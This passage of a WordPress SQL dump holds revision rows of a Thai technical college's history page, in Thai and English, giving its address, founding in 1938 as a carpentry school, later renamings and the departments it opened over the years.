width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"wp-image-3077 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n<img class=\"aligncenter wp-image-3090 size-full\" src=\"/wp-content/uploads/2018/06/Map-Rayong-Technical-College-eng.jpg\" alt=\"\" width=\"800\" height=\"671\" />\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-08-14 11:07:28', '2018-08-14 04:07:28', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3724, 3, '2018-08-14 11:09:06', '2018-08-14 04:09:06', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><b>ประวัติวิทยาลัยเทคนิคระยอง</b></span></h2>\r\n<h3><span style=\"color: #808080;\"><b>สถาน</b><b>ที่ตั้ง </b><b> </b>วิทยาลัยเทคนิคระยองตั้งอยู่เลขที่ 086/13 ถนนตากสินมหาราช</span></h3>\r\n<h3><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>ตำบลท่าประดู่ อำเภอเมือง จังหวัดระยอง 21000</span></h3>\r\n<h3><span style=\"color: #ffffff;\">0000000000โทรศัพท์ 038-611-160, 038-611-192 โทรสาร 038-870-717</span></h3>\r\n<h3><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>มีพื้นที่ 76 ไร่ 2 งาน 17 ตารางวา</span></h3>\r\n<h3><span style=\"color: #808080;\"><b>ความเป็นมา</b><b> </b> <i>เมื่อวันที่ 3 ตุลาคม 2481</i> กรมอาชีวศึกษากรมอาชีวศึกษาร่วมกับจังหวัดระยองได้จัดตั้ง <i>\"โรงเรียนช่างไม้ระยอง\" </i>ขึ้นโดยอาศัยศาลาการเปรียญของวัดเก๋ง ซึ่งเป็นวัดร้าง (ปัจจุบันเป็นสถานที่ตั้งของโรงพยาบาลระยอง) เป็นสถานที่เรียนชั่วคราว ต่อมาได้รับบริจาคที่ดินจำนวน 5 ไร่ จาก นายเหลียง เปี่ยมพงศ์สานต์ และจัดตั้งเป็นสถานศึกษาอันเป็นตำบลที่ตั้งของวิทยาลัยเทคนิคระยองในปัจจุบัน</span></h3>\r\n<h3><span style=\"color: #808080;\"><b>ความเป็นมา</b><b> </b><i>ในปีพ.ศ.2501</i> ได้ซื้อที่ดินเพิ่มขึ้นอีก 5 ไร่ ได้รับอนุมัติให้เปลี่ยนชื่อเป็น <i>\"โรงเรียนการช่างไม้ระยอง\" </i>เมื่อ พ. ศ. 2509 กระทรวงศึกษาธิการประกาศรวม <i>\"โรงเรียนการช่างไม้ระยอง\" </i>และ <i>\"โรงเรียนการช่างสตรีระยอง\" </i>เป็นโรงเรียนเดียวกัน ให้ชื่อว่า <i>\"โรงเรียนการช่างระยอง\" </i>และได้รับอนุมัติให้ชื่อเป็น <i>\"โรงเรียนเทคนิคระยอง\" </i>เมื่อวันที่ 1 พฤษภาคม 2520 ต่อมาได้รับการยกฐานะจากโรงเรียนเป็นวิทยาลัยโดยให้ชื่อเป็น <i>\"วิทยาลัยเทคนิคระยอง\" </i>ตั้งแต่วันที่ 1 พฤษภาคม 2523 จนถึงปัจจุบัน</span></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px;\"><img class=\"wp-image-953 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n<img class=\"wp-image-954 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"wp-image-3077 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n<img class=\"aligncenter wp-image-3090 size-full\" src=\"/wp-content/uploads/2018/06/Map-Rayong-Technical-College-eng.jpg\" alt=\"\" width=\"800\" height=\"671\" />\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-08-14 11:09:06', '2018-08-14 04:09:06', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3725, 3, '2018-08-14 11:09:47', '2018-08-14 04:09:47', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><b>ประวัติวิทยาลัยเทคนิคระยอง</b></span></h2>\r\n<h3><span style=\"color: #808080;\"><b>สถาน</b><b>ที่ตั้ง </b><b> </b>วิทยาลัยเทคนิคระยองตั้งอยู่เลขที่ 086/13 ถนนตากสินมหาราช</span></h3>\r\n<h3><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>ตำบลท่าประดู่ อำเภอเมือง จังหวัดระยอง 21000</span></h3>\r\n<h3><span style=\"color: #ffffff;\">000000000<span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0</span>โทรศัพท์ 038-611-160, 038-611-192 โทรสาร 038-870-717</span></span></h3>\r\n<h3><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>มีพื้นที่ 76 ไร่ 2 งาน 17 ตารางวา</span></h3>\r\n<h3><span style=\"color: #808080;\"><b>ความเป็นมา</b><b> </b> <i>เมื่อวันที่ 3 ตุลาคม 2481</i> กรมอาชีวศึกษากรมอาชีวศึกษาร่วมกับจังหวัดระยองได้จัดตั้ง <i>\"โรงเรียนช่างไม้ระยอง\" </i>ขึ้นโดยอาศัยศาลาการเปรียญของวัดเก๋ง ซึ่งเป็นวัดร้าง (ปัจจุบันเป็นสถานที่ตั้งของโรงพยาบาลระยอง) เป็นสถานที่เรียนชั่วคราว ต่อมาได้รับบริจาคที่ดินจำนวน 5 ไร่ จาก นายเหลียง เปี่ยมพงศ์สานต์ และจัดตั้งเป็นสถานศึกษาอันเป็นตำบลที่ตั้งของวิทยาลัยเทคนิคระยองในปัจจุบัน</span></h3>\r\n<h3><span style=\"color: #808080;\"><b>ความเป็นมา</b><b> </b><i>ในปีพ.ศ.2501</i> ได้ซื้อที่ดินเพิ่มขึ้นอีก 5 ไร่ ได้รับอนุมัติให้เปลี่ยนชื่อเป็น <i>\"โรงเรียนการช่างไม้ระยอง\" </i>เมื่อ พ. ศ. 2509 กระทรวงศึกษาธิการประกาศรวม <i>\"โรงเรียนการช่างไม้ระยอง\" </i>และ <i>\"โรงเรียนการช่างสตรีระยอง\" </i>เป็นโรงเรียนเดียวกัน ให้ชื่อว่า <i>\"โรงเรียนการช่างระยอง\" </i>และได้รับอนุมัติให้ชื่อเป็น <i>\"โรงเรียนเทคนิคระยอง\" </i>เมื่อวันที่ 1 พฤษภาคม 2520 ต่อมาได้รับการยกฐานะจากโรงเรียนเป็นวิทยาลัยโดยให้ชื่อเป็น <i>\"วิทยาลัยเทคนิคระยอง\" </i>ตั้งแต่วันที่ 1 พฤษภาคม 2523 จนถึงปัจจุบัน</span></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px;\"><img class=\"wp-image-953 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n<img class=\"wp-image-954 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"wp-image-3077 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n<img class=\"aligncenter wp-image-3090 size-full\" src=\"/wp-content/uploads/2018/06/Map-Rayong-Technical-College-eng.jpg\" alt=\"\" width=\"800\" height=\"671\" />\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-08-14 11:09:47', '2018-08-14 04:09:47', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3727, 3, '2018-08-14 11:11:31', '2018-08-14 04:11:31', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><strong>Rayong Technical College Background </strong></span></h2>\r\n<h3><span style=\"color: #808080;\"><strong>Located </strong>086/13, Taksin Maharach Rd, Tapradoo Sub-district,</span></h3>\r\n<h3><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Muang District, Rayong, Thailand 21000</span></h3>\r\n<h3><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Tel: 038-611-160, 038-611-192 Fax: 038-970-717</span></h3>\r\n<h3><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>The area of 122,468 sqm. (76 rai 2 ngan 17 sqw.)</span></h3>\r\n<h3><span style=\"color: #808080;\"><strong>Background,</strong> on the 3<sup>rd </sup>of October 1938 the Department of Vocational Education worked side by side with Rayong province to establish \"Chang Mai Rayong School” (Carpentry School). First the students studied on an empty lot in an unused sermon hall in the monastery of “Wat Keng”. This was a temporary place of study. Rayong hospital is now situated on the grounds that held “wat Keng\" Later the school received a generous donation of 8,000 sqm (5 rai) of land from Mr. Lieng Piempongsan. This was used to establish a place of education in a sub district of Rayong. To this day it remains the site and place of learning that is Rayong Technical College.</span></h3>\r\n<h3><span style=\"color: #808080;\"><strong>Background,</strong> in 1958 the school bought additional land of 8,000 sqm (5 rai) and got approved for a name change to “Karn Chang Mai Rayong School”. In 1966 The Ministry of Education affirmed that “Karn Chang Mai Rayong School” and “Karn Chang Satree Rayong” would be combined and become known as “ Karn Chang Rayong School” . On the 1st of October 1977 the school was upgraded to “Rayong Technical School”. Then on the 1st of May 1980 the school was elevated to what we know it as today “Rayong Technical College</span></h3>\r\n<h3></h3>', 'The College Background', '', 'inherit', 'closed', 'closed', '', '3626-revision-v1', '', '', '2018-08-14 11:11:31', '2018-08-14 04:11:31', '', 3626, 'http://www.technicrayong.ac.th/3626-revision-v1/', 0, 'revision', '', 0),
(3728, 3, '2018-08-14 11:12:20', '2018-08-14 04:12:20', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><strong>Rayong Technical College Background </strong></span></h2>\r\n<h3><span style=\"color: #808080;\"><strong>Located </strong>086/13, Taksin Maharach Rd, Tapradoo Sub-district,</span></h3>\r\n<h3><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Muang District, Rayong, Thailand 21000</span></h3>\r\n<h3><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Tel: 038-611-160, 038-611-192 Fax: 038-970-717</span></h3>\r\n<h3><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>The area of 122,468 sqm. (76 rai 2 ngan 17 sqw.)</span></h3>\r\n<h3><span style=\"color: #808080;\"><strong>Background,</strong> on the 3<sup>rd </sup>of October 1938 the Department of Vocational Education worked side by side with Rayong province to establish \"Chang Mai Rayong School” (Carpentry School). First the students studied on an empty lot in an unused sermon hall in the monastery of “Wat Keng”. This was a temporary place of study. Rayong hospital is now situated on the grounds that held “wat Keng\" Later the school received a generous donation of 8,000 sqm (5 rai) of land from Mr. Lieng Piempongsan. This was used to establish a place of education in a sub district of Rayong. To this day it remains the site and place of learning that is Rayong Technical College.</span></h3>\r\n<h3><span style=\"color: #808080;\"><strong>Background,</strong> in 1958 the school bought additional land of 8,000 sqm (5 rai) and got approved for a name change to “Karn Chang Mai Rayong School”. In 1966 The Ministry of Education affirmed that “Karn Chang Mai Rayong School” and “Karn Chang Satree Rayong” would be combined and become known as “ Karn Chang Rayong School” . On the 1st of October 1977 the school was upgraded to “Rayong Technical School”. Then on the 1st of May 1980 the school was elevated to what we know it as today \"Rayong Technical College\"</span></h3>\r\n<h3></h3>', 'The College Background', '', 'inherit', 'closed', 'closed', '', '3626-revision-v1', '', '', '2018-08-14 11:12:20', '2018-08-14 04:12:20', '', 3626, 'http://www.technicrayong.ac.th/3626-revision-v1/', 0, 'revision', '', 0),
(3730, 3, '2018-08-14 11:19:37', '2018-08-14 04:19:37', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><b>ประวัติวิทยาลัยเทคนิคระยอง</b></span></h2>\r\n<h3><span style=\"color: #808080;\"><b>สถาน</b><b>ที่ตั้ง </b><b> </b>วิทยาลัยเทคนิคระยองตั้งอยู่เลขที่ 086/13 ถนนตากสินมหาราช</span></h3>\r\n<h3><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>ตำบลท่าประดู่ อำเภอเมือง จังหวัดระยอง 21000</span></h3>\r\n<h3><span style=\"color: #ffffff;\">000000000<span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0</span>โทรศัพท์ 038-611-160, 038-611-192 โทรสาร 038-870-717</span></span></h3>\r\n<h3><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>มีพื้นที่ 76 ไร่ 2 งาน 17 ตารางวา</span></h3>\r\n<h3><span style=\"color: #808080;\"><b>ความเป็นมา</b><b> </b> <i>เมื่อวันที่ 3 ตุลาคม 2481</i> กรมอาชีวศึกษากรมอาชีวศึกษาร่วมกับจังหวัดระยองได้จัดตั้ง <i>\"โรงเรียนช่างไม้ระยอง\" </i>ขึ้นโดยอาศัยศาลาการเปรียญของวัดเก๋ง ซึ่งเป็นวัดร้าง (ปัจจุบันเป็นสถานที่ตั้งของโรงพยาบาลระยอง) เป็นสถานที่เรียนชั่วคราว ต่อมาได้รับบริจาคที่ดินจำนวน 5 ไร่ จาก นายเหลียง เปี่ยมพงศ์สานต์ และจัดตั้งเป็นสถานศึกษาอันเป็นตำบลที่ตั้งของวิทยาลัยเทคนิคระยองในปัจจุบัน</span></h3>\r\n<h3><span style=\"color: #808080;\"><b>ความเป็นมา</b><b> </b><i>ในปีพ.ศ.2501</i> ได้ซื้อที่ดินเพิ่มขึ้นอีก 5 ไร่ ได้รับอนุมัติให้เปลี่ยนชื่อเป็น <i>\"โรงเรียนการช่างไม้ระยอง\" </i>เมื่อ พ. ศ. 2509 กระทรวงศึกษาธิการประกาศรวม <i>\"โรงเรียนการช่างไม้ระยอง\" </i>และ <i>\"โรงเรียนการช่างสตรีระยอง\" </i>เป็นโรงเรียนเดียวกัน ให้ชื่อว่า <i>\"โรงเรียนการช่างระยอง\" </i>และได้รับอนุมัติให้ชื่อเป็น <i>\"โรงเรียนเทคนิคระยอง\" </i>เมื่อวันที่ 1 พฤษภาคม 2520 ต่อมาได้รับการยกฐานะจากโรงเรียนเป็นวิทยาลัยโดยให้ชื่อเป็น <i>\"วิทยาลัยเทคนิคระยอง\" </i>ตั้งแต่วันที่ 1 พฤษภาคม 2523 จนถึงปัจจุบัน</span></h3>\r\n<h2><span style=\"color: #808080;\"><b>การจัดการศึกษา</b></span></h2>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2481</i></b> เปิดการสอนระดับอาชีวศึกษาชั้นต้น หลักสูตร 3 ปี รับผู้จบประโยคประถมศึกษา(ป.4) </span><span style=\"color: #808080;\">เข้าเรียนแผนกช่างไม้ และมีนักเรียนรุ่นแรก 34 คน </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2485</i></b><b> </b> เปิดสอนแผนกช่างตัดผม หลักสูตร 2 ปี แล้วยุบไป เพราะไม่มีนักเรียนสมัครเข้าเรียน </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2492</i></b><b> </b>เปิดสอนแผนกช่างตัดผมครั้งที่ 2 และขยายห้องเรียนแผนกช่างไม้ ปีที่ 1 เพิ่มเป็น 3 ห้องเรียน</span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2493 </i></b>ยุบแผนกช่างตัดผมเป็นครั้งที่ 2 </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2496 </i></b>ขยายการศึกษาถึงระดับมัธยมศึกษาตอนปลาย รับผู้จบชั้นมัธยมอาชีวศึกษาตอนต้นและรับผู้จบชั้นมัธยมปีที่ 3 สายสามัญ หลักสูตร 3 ปี แผนกช่างไม้ปลูกสร้าง </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2500 </i></b>เปิดสอนระดับมัธยมอาชีวศึกษาตอนปลาย แผนกช่างยนต์ </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2503 </i></b>เปิดสอนระดับอาชีวะชั้นสูง แผนกช่างไม้ปลูกสร้าง และยุบแผนกช่างยนต์ </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2506 </i></b>เปิดสอนแผนกช่างยนต์ครั้งที่ 2 เปิดสอนระดับมัธยมศึกษาตอนปลาย (ม.4-6) สายอาชีพ แผนกช่างก่อสร้าง </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2513 </i></b>เปิดสอนระดับมัธยมศึกษาตอนปลาย แผนกช่างเชื่อมโลหะแผ่น </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2519</i></b> เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกช่างกลโรงงาน </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2520 </i></b>เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกช่างไฟฟ้า </span></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px;\"><span style=\"color: #808080;\"><b><i>พ.ศ.2522 </i></b>เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกพณิชยการ </span></h3>\r\n<img class=\"wp-image-954 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"wp-image-3077 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n<img class=\"aligncenter wp-image-3090 size-full\" src=\"/wp-content/uploads/2018/06/Map-Rayong-Technical-College-eng.jpg\" alt=\"\" width=\"800\" height=\"671\" />\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-08-14 11:19:37', '2018-08-14 04:19:37', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
